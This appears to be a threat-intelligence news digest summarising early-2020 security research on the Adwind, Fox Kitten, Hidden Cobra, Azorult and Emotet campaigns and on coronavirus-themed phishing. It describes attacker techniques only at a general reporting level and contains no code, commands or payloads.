At a glance.
- Adwind hits companies in Turkey.
- Fox Kitten cyber campaign linked to Iran.
- FBI, CISA, US Cyber Command describe Hidden Cobra tools.
- Azorult Trojan misrepresents itself as a ProtonVPN installer.
- Emotet is better than Necurs at extortion.
- Coronavirus as phishbait.
Adwind campaign is targeting Turkish companies.
Check Point is tracking an "evolving, ongoing malspam campaign that is targeting more than 80 Turkish companies." The malware is distributed via phishing emails that contain either XLS or CSV files in the deprecated BIFF5 file format. The XLS files use an ExternSheet injection to download a heavily obfuscated JAR file, while the CSV files use spreadsheet formula injection to download the same JAR file. This JAR file will then download the Adwind remote access Trojan from a GitHub repository.
Once installed, the malware performs a series of checks to ensure that the infected machine's location, language settings, and public IP address indicate that the user is Turkish. If the machine fails any of these checks, the malware will cease its execution.
The researchers note that Cisco Talos and ReversingLabs first spotted this campaign in September 2018, and Sophos described it in July 2019. Check Point observes that the threat actors seem to be improving and adapting their techniques to remain undetected. Despite the length of the campaign, their activity is still flying largely under the radar. Check Point and Sophos point out that these specific types of ExternSheet injection and spreadsheet formula injection are well-known but relatively uncommon techniques, which is one of the reasons why the malware has such a low detection rate.
It's not clear who's behind the campaign or what they're after. Sophos says the attackers' decent grasp of the Turkish language, along with the fact that early test samples of the malware were uploaded from Turkey, "lends credibility to the hypothesis that both the origin and targets of this campaign are in Turkey," but this evidence is circumstantial and doesn't hint at their motives.
APTs 34, 33, and 39 suspected in Fox Kitten attacks.
ClearSky researchers have discovered a large espionage campaign which they attribute to Iranian APTs, particularly APT34 (OilRig) with possible participation from APT33 (Elfin) and APT39 (Chafer). ClearSky calls the operation "Fox Kitten," and they say it represents one of "Iran’s most continuous and comprehensive campaigns." The researchers say this campaign is tied to the group tracked by Dragos as "PARISITE," which in turn is linked to MAGNALLIUM (although Dragos, as a rule, doesn't do attribution). ClearSky believes the campaign displays extensive collaboration between APT34 and APT33, to the point where the two groups could possibly be considered as one.
Fox Kitten focuses on organizations in the IT, oil and gas, electricity, aviation, government, and security sectors. The targeted organizations to date have been located in Israel, the US, Saudi Arabia, Lebanon, Kuwait, the United Arab Emirates, Australia, France, Poland, Germany, Finland, Hungary, Italy, and Austria. The goal of the operation appears to be intelligence gathering and supply chain compromise.
The threat actors primarily make use of vulnerabilities in various VPN services to gain initial access to their targets. The researchers say the group is skilled at quickly developing exploits after these vulnerabilities are disclosed. After gaining access, the attackers establish persistence "by opening a variety of communication tools, including opening RDP links over SSH tunneling." After this, they begin seeking out and exfiltrating sensitive data.
US government discloses North Korean malware.
US Cyber Command on Friday released six new malware samples used by the North Korea-aligned threat group Hidden Cobra. The Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) simultaneously published Malware Analysis Reports on each new sample (ARTFULPIE, BISTROMATH, BUFFETLINE, CROWDEDFLOUNDER, HOTCROISSANT, and SLICKSHOES) along with a report on a seventh sample (HOPLIGHT) that was previously disclosed by the DHS and the FBI.
Azorult masquerades as ProtonVPN installer.
Kaspersky warns that the Azorult commodity Trojan is being distributed via phony ProtonVPN installers for Windows. The attackers registered a domain called "protonvpn[.]store" and used the HTTrack website copier to make a duplicate of ProtonVPN's legitimate site.
Azorult in this case is configured to "steal cryptocurrency from locally available wallets (Electrum, Bitcoin, Ethereum, etc.), FTP logins and passwords from FileZilla, email credentials, information from locally installed browsers (including cookies), credentials for WinSCP, Pidgin messenger and others."
ProtonVPN itself also says it's seen an increase in the number of malicious Android apps posing as the ProtonVPN app in the Google Play Store. The company stresses that "ProtonVPN apps are only available on the App Store, the Play Store, or on the ProtonVPN website," noting that users should make sure they're downloading the legitimate app even when they're using an official app store.
Emotet is much more effective than Necurs at sextortion.
Researchers at IBM X-Force have found that sextortion spam emails sent by Emotet's botnet have been generating ten times more money than similar sextortion emails sent by the Necurs botnet. The researchers believe this is due to the fact that Emotet targets victims' workplace email addresses, which places greater pressure on the victims to resolve the matter quickly and quietly. Additionally, Emotet requests payment in Bitcoin, while Necurs asked for Dashcoin (which has a much lower value than Bitcoin).
Coronavirus used as phishbait.
Cisco Talos summarizes the ongoing wave of coronavirus-themed phishing campaigns. While attackers capitalizing on current events is nothing new or unexpected, Talos believes it's worth spreading the word about these particular scams. The coronavirus is both well-known and feared globally, which provides attackers with excellent bait for widespread phishing campaigns. Talos has observed campaigns distributing Trojans including Emotet, Parallax, Nanocore, as well as wipers, adware, and "a lot of weird executables and other files floating around," all of which make use of phishing lures that reference the virus.